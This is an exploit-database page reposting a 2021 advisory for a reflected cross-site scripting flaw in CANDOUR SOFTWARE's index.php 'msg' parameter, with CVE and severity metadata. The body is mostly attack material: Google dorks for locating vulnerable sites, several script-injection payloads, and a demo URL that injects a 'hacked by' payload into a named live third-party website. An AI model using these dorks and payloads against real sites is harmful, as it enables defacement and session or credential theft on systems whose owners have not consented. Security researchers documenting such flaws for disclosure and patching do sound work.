Advertisement






CANDOUR SOFTWARE Cross Site Scripting (XSS)

CVE Category Price Severity
CVE-2021-28017 CWE-79 $4,000 High
Author Risk Exploitation Type Date
exploitdb High Remote 2021-01-31
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021010206

Below is a copy:

CANDOUR SOFTWARE Cross Site Scripting (XSS)
[+] Title: CANDOUR SOFTWARE Cross Site Scripting (XSS)
[+] date: 2021-01-31
[+] Author: h4shur
[+] Vendor Homepage: http://www.candoursoft.com/
[+] Tested on: Windows 10 & Google Chrome
[+] Vulnerable File: /index.php?msg=
[+] Vulnerable Parameter: Get Method
[+] Dork: intext:"Powered By : CANDOUR SOFTWARE"
intext:"Powered By : CANDOUR SOFTWARE" inurl:"/index.php?msg="

### POC:

[+} site.com/index.php?msg=


### Xss Alert Code: "><script>alert()</script>
"><svg onload=alert()>

                    '><script>alert('');</script>

<IMG "'"><script>alert()</script>'>

And Etc.


### Demo:

[+] http://mafe.aftersales.in/index.php?msg=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E

### thanks to :
* s433d3h

### Contact Me :

* Email : [email protected]
* twitter : @h4shur
* Telegram : @h4shur
* Instagram : @netedit0r

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.